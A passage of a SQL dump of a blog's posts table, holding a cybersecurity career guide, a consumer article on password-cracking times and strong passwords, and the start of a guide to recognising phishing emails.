Certified in Cybersecurity</a></strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"11\">Completely free and an excellent introductory course for cybersecurity beginners.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For a comprehensive learning experience, we recommend combining the <b><strong class=\"font-bold\">CompTIA Security+</strong></b> with the <b><strong class=\"font-bold\">Google Cybersecurity Certificate</strong></b> to gain both theoretical understanding and practical skills.</p>\r\n\r\n<h2 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Discover Your Cybersecurity Path</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity spans multiple specializations such as Cloud Security, Penetration Testing, and Security Analysis. After completing your beginner courses, explore these niches further to determine where your interests lie.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Additionally, focus on crafting an impressive CV that highlights your skills and certifications.</p>\r\n\r\n<h2 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Gain Hands-On Experience with Projects</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practical experience is essential for any cybersecurity career. Start building your portfolio with these beginner-friendly projects to demonstrate your skills to potential employers.</p>\r\n\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/en/us/solutions/small-business/resource-center/networking/how-to-build-small-business-network.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a Network</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/en_us/blog/learn/siem-tutorial.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a SIEM</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/paralax/awesome-honeypots\" target=\"_blank\" rel=\"nofollow noopener\">Build a Honeypot</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html\" target=\"_blank\" rel=\"nofollow noopener\">Build a Malware Analysis Lab</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://ctfd.io/whats-a-ctf/\" target=\"_blank\" rel=\"nofollow noopener\">Create a CTF Challenge</a></strong></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These projects will allow you to apply what you’ve learned and work on real-world scenarios, boosting your confidence and expertise.</p>\r\n\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">5. SOC Level 1 on TryHackMe</h2>\r\nAfter creating your initial projects, consider enhancing your skills with the SOC Level 1 course on TryHackMe. This course dives deep into analyzing and responding to security incidents, preparing you for roles such as a Cybersecurity Analyst.<strong>\r\n<a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tryhackme.com/path/outline/soclevel1\" target=\"_blank\" rel=\"nofollow noopener\">TryHackMe SOC Level 1</a></strong>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">6. Complete a Virtual Internship</h2>\r\nGain real-world experience through virtual internship programs offered by major companies:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/Hf4QMESoFeQwXPsiH/Mastercard-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">Mastercard Cybersecurity Virtual Experience Program</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/mADkQGHo4x7kN6kLv/JPMorgan-Chase-Cybersecurity-Virtual-Experience\" target=\"_blank\" rel=\"nofollow noopener\">JPMorgan Chase &amp; Co. Cybersecurity Virtual Experience</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/CfGzTzHzee9zJpNzs/Commonwealth-Bank-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">Commonwealth Bank Cybersecurity Virtual Experience Program</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.theforage.com/virtual-internships/prototype/9GEqq3DpDLBzZAqgM/AIG-Cybersecurity-Virtual-Experience-Program\" target=\"_blank\" rel=\"nofollow noopener\">AIG Shields Up: Cybersecurity Virtual Experience Program</a></strong></li>\r\n</ul>\r\nThese internships provide valuable insights into the cybersecurity industry and can be added to your CV.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">7. Advanced Courses</h2>\r\nTo further enhance your knowledge, consider these advanced courses:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://tryhackme.com/path/outline/soclevel2\" target=\"_blank\" rel=\"nofollow noopener\">TryHackMe SOC Level 2</a></strong></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://securityblue.team/why-btl1/\" target=\"_blank\" rel=\"nofollow noopener\">Blue Team Level 1</a></strong></li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://letsdefend.io/soc-analyst-path.html\" target=\"_blank\" rel=\"nofollow noopener\"><strong>Let\'s Defend SOC Analyst Path</strong></a></li>\r\n 	<li><strong><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://cyberdefenders.org/\" target=\"_blank\" rel=\"nofollow noopener\">Cyber Defenders</a></strong></li>\r\n</ul>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\">8. Applying for Jobs</h2>\r\nThroughout your learning journey, continuously update your CV and apply for jobs. Create a LinkedIn profile and search for opportunities in your area. Apply to as many relevant positions as possible to increase your chances of landing your first cybersecurity role. By following this comprehensive guide, you\'ll be well on your way to launching a successful career in cybersecurity. Remember, persistence and continuous learning are key in this rapidly evolving field.\r\n\r\nGood luck on your cybersecurity journey!\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keep your CV updated throughout your learning process. Create a LinkedIn profile showcasing your certifications, projects, and internships. Use your network and online job portals to discover opportunities and apply for as many relevant positions as possible.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By taking this proactive approach, you’ll increase your chances of landing your first role in cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Tips for Launching Your Cybersecurity Career</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Persistence is key</strong></b>. The cybersecurity job market is competitive, but regular skill updates and active job applications can help you secure the right position.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay informed</strong></b>. Cyber threats are constantly evolving. Stay up-to-date by following cybersecurity news and trends.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Continuous Learning</strong></b>. Certifications, training, and workshops will keep you ahead of the curve and boost your long-term career growth.</li>\r\n</ul>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:36:12', '2026-01-12 21:41:44', 'Information Security', 'A Comprehensive Guide to Starting Your Cybersecurity Career', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(118, 'How Long Does It Take for a Hacker to Crack a Password?', 'how-long-does-it-take-for-a-hacker-to-crack-a-password', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Securing your online accounts has never been more critical. With cyber threats continuing to evolve, strong passwords remain your first line of defense. But have you ever wondered just how secure your password is, or how long it would take a hacker to crack it?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide explores the intricacies of password security, helping you understand how passwords are cracked, the factors that influence their security, and practical tips to create robust passwords that keep your data safe.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Password Cracking?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password cracking is the process hackers use to discover passwords through stored or transmitted data, typically employing specialized algorithms and powerful software tools. These methods aim to break password security and access sensitive data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to check your password\'s security? Try these tools to get started:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://cybernews.com/password-leak-check\">Check if your password has been leaked</a>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://haveibeenpwned.com/\">Find out if your email has been compromised in a data breach</a>.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.passwordmonster.com/\">Test your password’s strength</a>.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Factors That Affect How Quickly a Password Can Be Cracked</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Password Length</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The length of your password directly influences the time it takes to crack. Here’s an approximate breakdown of how long it might take to crack a password based on its length alone:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">5 characters: Instantly cracked.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">7 characters: A few seconds to minutes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">9 characters: Hours to days.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">12 characters: Years to decades.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">15+ characters: Tens of thousands to millions of years.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Simply adding extra characters to your password drastically increases its security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Password Complexity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password complexity refers to the combination of character types used. A password that includes uppercase and lowercase letters, numbers, and special characters is far harder to crack. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“password” (lowercase letters only): Cracked instantly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“Password1” (lowercase, uppercase, and a number): A few hours.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">“P@ssw0rd!” (includes all character types): Several days or weeks.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Password Uniqueness</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using the same password across multiple accounts is a dangerous practice. If one password is hacked, all accounts with the same password become vulnerable.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Methods Hackers Use to Crack Passwords</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Brute Force Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A brute force attack systematically tries every possible character combination until the correct one is found. While effective, this method becomes exponentially slower with longer and more complex passwords.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Dictionary Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This method uses pre-compiled lists of commonly used words and passwords. If your password is something simple like \"sunflower,\" a dictionary attack is likely to crack it quickly.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Rainbow Table Attacks</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Instead of guessing passwords individually, rainbow tables use pre-computed data to reverse cryptographic hashes. This method works well against systems with poorly hashed password databases.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Phishing and Social Engineering</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hackers often bypass password cracking altogether by tricking individuals into sharing their passwords, typically through fraudulent emails or fake login pages.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Strengthen Your Password Security</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Long Passwords</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Aim for at least 12 characters—but go longer if possible. Each additional character exponentially increases the cracking time.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Mix Character Types</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create passwords that incorporate uppercase and lowercase letters, numbers, and special symbols. Avoid predictable substitutions like replacing \"E\" with \"3\" or \"A\" with \"@,\" as hackers are familiar with these tricks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Avoid Personal Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t use names, birthdays, or other personal details that hackers can easily guess from social media or public records.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Use Passphrases</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Passphrases like \"ILovePizzaWithExtraCheese!\" are both long and memorable, making them an excellent alternative to random strings of characters.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Invest in a Password Manager</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Password managers can generate and store strong, unique passwords for all your accounts, easing the burden of remembering multiple complex passwords.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Enable Two-Factor Authentication (2FA)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if your password is compromised, 2FA adds an additional security layer that requires a second verification step, such as a code sent to your phone.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Password Cracking Examples</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how long it might take to crack some common passwords using brute force attacks on a modern computer system:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">“123456”: Less than a second.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">“qwerty”: Less than a second.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">“password1”: A few seconds.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">“iloveyou123”: A few minutes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">“P@ssw0rd”: A few hours.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">“correcthorsebatterystaple”: Over 50 years.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">“J7K$9Lm2@pX#rT4”: Potentially millions of years.</li>\r\n</ul>\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Future of Password Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While strong passwords remain essential today, a shift toward passwordless authentication methods is gaining traction. Emerging technologies like biometrics (e.g., fingerprint or facial recognition) and behavioral biometrics (e.g., how you type) may minimize password reliance.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Until then, practicing effective password management is vital to maintaining your cybersecurity.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Secure Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity starts with strong passwords. Use tools like password strength meters or breach-checking platforms to evaluate your password\'s security and ensure your accounts are protected. A proactive approach to password hygiene not only protects your data but also keeps you one step ahead of potential hackers.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:34:54', '2026-01-12 21:41:44', 'Information Security', 'How Long Does It Take for a Hacker to Crack a Password?', '', NULL),
(119, 'What Should You Do If You Receive a Suspicious Email', 'what-should-you-do-if-you-receive-a-suspicious-email', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are one of the most common cybersecurity threats faced by individuals and businesses today. Cybercriminals use these fake messages to trick recipients into revealing sensitive information, such as passwords, credit card numbers, and even Social Security details, or to inject malware onto their devices. Protecting yourself and your organization from phishing attacks requires a keen eye, quick action, and a proactive approach.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will not only help you identify phishing attempts but also provide actionable cybersecurity tips to mitigate the risks and prevent falling victim to email scams.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">What Is a Phishing Email?</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A phishing email is a fraudulent message designed to deceive you into taking harmful actions. These scams often masquerade as legitimate communications from trusted organizations, like banks, e-commerce platforms, or service providers. The ultimate goal of phishing is to either steal your information or infect your devices with malware.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The stakes are high, but with the right knowledge and precautions, you can stay one step ahead of cybercriminals.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. How to Identify a Phishing Email</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before responding to an email or clicking a link, learn to recognize the red flags typically present in phishing emails. Here’s what to look for:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Unknown Senders</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Be wary of emails from unfamiliar senders. Legitimate organizations use official and recognizable domain names for their communications. For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A trusted bank will use an email like <b><strong class=\"font-bold\">support@yourbank.com</strong></b>, not something random like <b><strong class=\"font-bold\">service@secure-login123.com</strong></b>.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the sender’s address looks suspicious or unprofessional, treat the email as a potential phishing attempt.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Urgent or Threatening Language</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishers often create a false sense of urgency to push you into quick, irrational actions. Common tactics include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] 